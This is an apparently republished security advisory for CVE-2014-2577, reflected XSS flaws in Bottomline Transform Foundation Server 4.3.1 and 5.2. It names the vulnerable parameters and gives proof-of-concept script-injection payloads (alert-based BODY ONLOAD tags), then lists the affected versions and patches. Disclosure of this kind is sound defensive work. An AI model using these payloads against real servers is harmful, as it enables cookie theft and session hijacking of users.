[CVE-2014-2577] XSS on Transform Foundation Server 4.3.1 and 5.2 from Bottomline Technologies

2014-06-14T00:00:00
ID SECURITYVULNS:DOC:30844
Type securityvulns
Reporter Securityvulns
Modified 2014-06-14T00:00:00

Description

I. VULNERABILITY

Reflected XSS Attacks vulnerabilities in Transform Foundation server 4.3.1 and 5.2 from Bottomline Technologies

II. BACKGROUND

Bottomline offers powerful, next-generation electronic document solutions for formatting, personalizing and delivering ERP and business application output.

III. DESCRIPTION

Has been detected several Reflected XSS vulnerability in Transform Foundation server 4.3.1 and 5.2

  1. XSS on GET parameters:

http://XXXXXXXXX/TransformContentCenter/index.fsp/document.pdf?pn="XSS CODE"

http://XXXXXXXXXXXXX/"XSS CODE"server-status.cgi

  1. XSS on POST parameters:

URL: XXXXXXXXX/TransformContentCenter/index.fsp/index.fsp

PARAMETERS:

db="XSS CODE" referer="XSS CODE"

IV. PROOF OF CONCEPT

GET:

The application does not validate the parameter "pn" correctly.

http://XXXXXXXXX/TransformContentCenter/index.fsp/document.pdf?pn=</i></p><BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>

http://XXXXXXXXXXXXX/<BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>server-status.cgi

POST:

The application does not validate the parameter "db" and "rerferer" correctly.

XXXXXXXXX/TransformContentCenter/index.fsp/index.fsp

db=</td></tr><BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>

and

referer=</td></tr><BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar')

V. BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser allowing Cookie Theft/Session Hijacking, thus enabling full access the box.

VI. SYSTEMS AFFECTED

Transform Foundation Server 4.3.1 Transform Foundation Server 5.2

VII. SOLUTION

Patches released by the vendor available on customer portal and information available here:

  1. Transform Foundation Server 4.3.1 Patch 8: http://www.pdf-archive.com/2014/06/03/tf431patch8releasenotes/preview/page/9/

SF2351630 SF2364411 SF2391461

  1. Transform Foundation Server 5.2 Patch 7:

http://www.pdf-archive.com/2014/06/03/tf431patch8releasenotes/preview/page/9/

SF2351630 SF2364411 SF2391461

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2577

Detected and reported by J. Francisco Bolivar (es.linkedin.com/in/jfbolivar/) @Jfran_cbit